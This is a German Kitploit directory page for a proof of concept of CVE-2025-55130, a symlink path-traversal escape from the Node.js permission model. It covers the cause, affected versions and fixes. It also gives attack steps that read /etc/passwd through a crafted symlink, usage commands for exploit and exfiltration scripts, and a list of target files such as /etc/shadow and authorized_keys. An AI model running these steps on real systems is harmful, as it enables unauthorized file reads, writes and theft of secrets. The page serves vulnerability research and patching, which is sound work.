Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55130 — PoC für CVE-2025-55130 | Kitploit
Tools/GitHubGitHub/scumfrog/cve-2025-55130
Privilege EscalationSchwachstellenanalyseExploitationDatenexfiltrationWebsicherheitContainer-Ausbruch
GitHubscumfrog/cve-2025-55130

CVE-2025-55130

PoC für CVE-2025-55130

Repository anzeigen
14vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55130 - Symlink-Escape im Node.js-Berechtigungsmodell

root@kitploit:~
   ___ _   _ ___     ____   ____ ____  ____      ____ ____ _ _____ ___  
  / __| | | | __|___/ _  \ / _ \___ \| ___|    | ___| ___/ |___ // _ \ 
 | (__| |_| | _|___| |_| || | | |__) |___ \ _____|__ \___ \ | |_ | | | |
  \___|\___/|___|   \__  ||_| |_|___/|_____|_____|__) |__) || |__) |_| |
                    |___/                       |____/____/|_|____/\___/ 
                                                                        
        Umgehung des Node.js-Berechtigungsmodells durch präparierte Symlinks
                   [ Entdeckt von natann @ JFrog ]

Übersicht

Ein Pfad-Traversal-Fehler in Node.js ermöglicht das Ausbrechen aus den Berechtigungsbeschränkungen von --allow-fs-read und --allow-fs-write mithilfe von Symlinks, die auf absolute Pfade verweisen, kombiniert mit relativer Traversierung.

Die Berechtigungsprüfung und die Pfadauflösung erfolgen getrennt. Sobald der anfängliche Pfad die Berechtigungsprüfung besteht, wird dem Symlink gefolgt und die Traversierungssequenzen verlassen die Sandbox.

Betroffene Versionen

BranchVerwundbar

Technische Analyse

Ursache

root@kitploit:~
Berechtigungsprüfung:  ./nested/dirs/symlink/../../../etc/passwd
                       ^^^^^^^^^^^^^^^^^^ ERLAUBT (beginnt mit ./)
                       
Pfadauflösung:         /actual/path/to/script/../../../etc/passwd
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
                       Löst auf zu /etc/passwd - AUSSERHALB DER SANDBOX

Das Berechtigungsmodell validiert die Pfadzeichenfolge vor der Symlink-Auflösung. Indem wir einen Symlink zu einem absoluten Pfad erstellen und die ../-Traversierung NACH dem Symlink verwenden, entkommen wir dem erlaubten Verzeichnis.

Angriffsablauf

root@kitploit:~
1. mkdir -p ./a/b/c/d/e/f/g           # Erstelle verschachtelte Verzeichnisse im erlaubten Pfad
2. ln -s $(pwd) ./a/b/c/d/e/f/g/x     # Symlink zu absolutem Pfad  
3. read ./a/b/c/d/e/f/g/x/../../../etc/passwd
         ^^^^^^^^^^^^^^^^^ 
         Berechtigungsprüfung bestanden (innerhalb ./)
         
   Nach Symlink-Auflösung:
   /home/user/project/../../../etc/passwd -> /etc/passwd
   ^^^^^^^^^^^^^^^^^^^^
   Traversierung entkommt in das Wurzelverzeichnis

Dateien

DateiZweck
exploit.jsHauptexploit – Beliebige Dateien lesen
exploit_write.jsBeliebige Dateien schreiben

Verwendung

root@kitploit:~
# Grundlegende Ausnutzung
node --permission --allow-fs-read=. --allow-fs-write=. exploit.js

# Auf Verwundbarkeit prüfen
node check.js

# Massenhafter Abfluss
node --permission --allow-fs-read=. --allow-fs-write=. exfil.js

Auswirkungen

  • Sensible Dateien lesen: /etc/passwd, /etc/shadow, SSH-Schlüssel, Konfigurationen
  • Beliebige Dateien schreiben: Cron-Jobs, authorized_keys, Konfigurationen
  • Container-Ausbruch in Multi-Tenant-Umgebungen
  • Umgehung der Sandbox zur Ausführung nicht vertrauenswürdigen Codes

Referenzen

  • https://research.jfrog.com/vulnerabilities/nodejs-fs-permissions-bypass-cve-2025-55130/
  • https://nodejs.org/en/blog/vulnerability/december-2025-security-releases
  • https://nvd.nist.gov/vuln/detail/CVE-2025-55130

Danksagungen

  • Verwundbarkeit: Natan Nehorai (natann) @ JFrog Security Research
  • Fix: RafaelGSS @ Node.js

Nur für Forschungs- und autorisierte Testzwecke.

Tool herunterladen
Gepatcht
20.x< 20.20.020.20.0
22.x< 22.22.022.22.0
24.x< 24.13.024.13.0
25.x< 25.3.025.3.0
exfil.jsMassenhafter Dateiabfluss
check.jsÜberprüfung der Version auf Verwundbarkeit